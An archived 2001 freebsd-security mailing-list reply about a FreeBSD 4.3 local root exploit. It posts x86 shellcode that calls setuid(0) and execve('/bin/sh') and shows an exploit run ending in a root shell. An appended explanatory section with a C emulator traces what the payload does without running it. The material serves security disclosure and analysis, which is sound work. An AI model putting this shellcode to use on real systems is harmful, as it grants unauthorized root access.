From owner-freebsd-security Thu Jul 12 10:36:53 2001
Message-ID: <087701c10af8$9ed30040$2001a8c0@clitoris>
From: "Przemyslaw Frasunek"
To: "jamie rishaw", "alexus"
Cc: "Gabriel Rocha"
References: <20010712120706.B1020@geeksimplex.org> <079e01c10aef$21fd1460$2001a8c0@clitoris> <001f01c10af7$9b42f120$97625c42@alexus> <20010712122743.C14782@playboy.com>
Subject: Re: FreeBSD 4.3 local root
Date: Thu, 12 Jul 2001 19:32:21 +0200
Organization: babcia padlina ltd.
Sender: owner-freebsd-security@FreeBSD.ORG

> su
> cd /tmp
> touch sh
> chmod 000 sh
> chflags schg sh

Anyone could use shellcode which calls /bin/sh directly; your fix won't work in that case...

unsigned char bsdshell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

riget:venglin:~> ./dupa
vvfreebsd.
Written by Georgi Guninski
shall jump to bfbffe4a
child=83578
Password:done
# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
# ls -la /tmp/sh
ls: /tmp/sh: No such file or directory

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
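The point of the reply is that the path the payload executes is carried inside the payload itself, so pinning /tmp/sh with chflags does nothing. The following is an added example, not code from the message, from Guninski's exploit or from FreeBSD: a small interpreter for exactly the i386 instruction subset the posted bytes use, which runs the shellcode in a sandboxed guest memory (no real syscall is made) and reports what it would ask the kernel for. The payload bytes are copied from the message; the guest load address 0x1000, the 4 KiB guest memory and the stack placement are arbitrary choices of this example. It relies on the FreeBSD/i386 convention that syscall arguments sit above a 4-byte dummy slot on the user stack, for both int 0x80 and the lcall 7,0 gate that the payload patches in at run time (the 0x04 and 0x07 0x04 bytes after the 0x9a opcode are rewritten to offset 0, selector 7 before they are reached).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Payload bytes exactly as posted in the message. */
static unsigned char bsdshell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

#define BASE  0x1000u   /* guest address the payload is loaded at (assumption of this example) */
#define MEMSZ 4096u     /* guest memory: payload at the bottom, stack near the top */
#define MAXSC 8
enum { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI };

typedef struct { uint32_t num, args[3]; } syscall_rec;
typedef struct { uint32_t r[8], eip; uint8_t mem[MEMSZ]; syscall_rec sc[MAXSC]; int nsc; } cpu;

static uint8_t *mp(cpu *c, uint32_t a) { return &c->mem[(a - BASE) % MEMSZ]; }
static uint32_t rd32(cpu *c, uint32_t a) {
    return (uint32_t)*mp(c, a) | (uint32_t)*mp(c, a + 1) << 8 |
           (uint32_t)*mp(c, a + 2) << 16 | (uint32_t)*mp(c, a + 3) << 24;
}
static void wr32(cpu *c, uint32_t a, uint32_t v) { for (int i = 0; i < 4; i++) *mp(c, a + i) = (uint8_t)(v >> 8 * i); }
static uint32_t fetch8(cpu *c) { return *mp(c, c->eip++); }
static uint32_t fetch32(cpu *c) { uint32_t v = rd32(c, c->eip); c->eip += 4; return v; }
static uint32_t sx8(uint32_t b) { return b & 0x80 ? b | 0xffffff00u : b; }   /* sign-extend rel8/disp8 */
static void push(cpu *c, uint32_t v) { c->r[ESP] -= 4; wr32(c, c->r[ESP], v); }
static uint32_t pop(cpu *c) { uint32_t v = rd32(c, c->r[ESP]); c->r[ESP] += 4; return v; }
static const char *guest_str(cpu *c, uint32_t a) { return (const char *)mp(c, a); }

/* ModRM forms this payload uses: mod=11 reg-reg, mod=00 [base], mod=01 [base+disp8].
 * Returns 1 for a register operand, 0 for memory (address in *ea), -1 for unmodelled forms. */
static int modrm(cpu *c, int *reg, int *rm, uint32_t *ea) {
    uint32_t b = fetch8(c), mod = b >> 6;
    *reg = (b >> 3) & 7; *rm = b & 7;
    if (mod == 3) return 1;
    if (mod == 2 || *rm == 4 || (mod == 0 && *rm == 5)) return -1;
    *ea = c->r[*rm] + (mod == 1 ? sx8(fetch8(c)) : 0);
    return 0;
}

/* FreeBSD/i386: number in eax, arguments on the user stack above a 4-byte dummy slot. */
static void record_syscall(cpu *c) {
    if (c->nsc >= MAXSC) return;
    syscall_rec *s = &c->sc[c->nsc++];
    s->num = c->r[EAX];
    for (int i = 0; i < 3; i++) s->args[i] = rd32(c, c->r[ESP] + 4 + 4 * i);
}

/* One instruction: 1 = continue, 2 = execve (59) reached, 0 = opcode outside the modelled subset. */
static int step(cpu *c) {
    int reg, rm, k; uint32_t ea, op = fetch8(c);
    if (op >= 0x50 && op <= 0x57) { push(c, c->r[op - 0x50]); return 1; }   /* push r32 */
    if (op >= 0x58 && op <= 0x5f) { c->r[op - 0x58] = pop(c); return 1; }   /* pop r32 */
    switch (op) {
    case 0x90: return 1;                                                     /* nop */
    case 0x31: if (modrm(c, &reg, &rm, &ea) != 1) return 0; c->r[rm] ^= c->r[reg]; return 1;
    case 0xb8: c->r[EAX] = fetch32(c); return 1;                             /* mov eax,imm32 */
    case 0x25: c->r[EAX] &= fetch32(c); return 1;                            /* and eax,imm32 */
    case 0xb0: c->r[EAX] = (c->r[EAX] & 0xffffff00u) | fetch8(c); return 1;  /* mov al,imm8 */
    case 0xeb: ea = sx8(fetch8(c)); c->eip += ea; return 1;                  /* jmp rel8 */
    case 0xe8: ea = fetch32(c); push(c, c->eip); c->eip += ea; return 1;     /* call rel32 */
    case 0x8d: if (modrm(c, &reg, &rm, &ea) != 0) return 0; c->r[reg] = ea; return 1; /* lea */
    case 0x89: k = modrm(c, &reg, &rm, &ea);                                 /* mov r/m32,r32 */
               if (k == 1) c->r[rm] = c->r[reg]; else if (k == 0) wr32(c, ea, c->r[reg]); else return 0;
               return 1;
    case 0x88: if (modrm(c, &reg, &rm, &ea) != 0 || reg > 3) return 0;       /* mov [m],al..bl */
               *mp(c, ea) = (uint8_t)c->r[reg]; return 1;
    case 0xcd: if (fetch8(c) != 0x80) return 0;                              /* int 0x80 */
               record_syscall(c); return c->r[EAX] == 59 ? 2 : 1;
    case 0x9a: { uint32_t off = fetch32(c), seg = fetch8(c); seg |= fetch8(c) << 8;
               if (seg != 7 || off != 0) return 0;                           /* lcall 7,0 gate */
               record_syscall(c); return c->r[EAX] == 59 ? 2 : 1; }
    default:   return 0;
    }
}

/* Load the payload at BASE and interpret it; returns the number of syscalls seen, -1 on failure. */
static int emulate(cpu *c, const unsigned char *code, size_t len) {
    if (len > MEMSZ / 2) return -1;
    memset(c, 0, sizeof *c);
    memcpy(c->mem, code, len);
    c->eip = BASE; c->r[ESP] = BASE + MEMSZ - 16;
    for (int i = 0; i < 1000; i++) { int k = step(c); if (k == 0) return -1; if (k == 2) return c->nsc; }
    return -1;
}

int main(void) {
    cpu c; int n = emulate(&c, bsdshell, sizeof bsdshell - 1);
    for (int i = 0; i < n; i++) {
        syscall_rec *s = &c.sc[i];
        if (s->num == 59) printf("execve(\"%s\", argv[0]=\"%s\", argv[1]=%s)\n", guest_str(&c, s->args[0]),
                                 guest_str(&c, rd32(&c, s->args[1])), rd32(&c, s->args[1] + 4) ? "..." : "NULL");
        else printf("%s(%u)\n", s->num == 23 ? "setuid" : "syscall", s->args[0]);
    }
    return n < 0;
}
```

Run as is; it prints setuid(0) followed by execve("/bin/sh", ...), with no file under /tmp involved at any point. Only the handful of opcodes the posted bytes use are modelled, so a different payload is likely to stop with an unsupported opcode rather than be misreported.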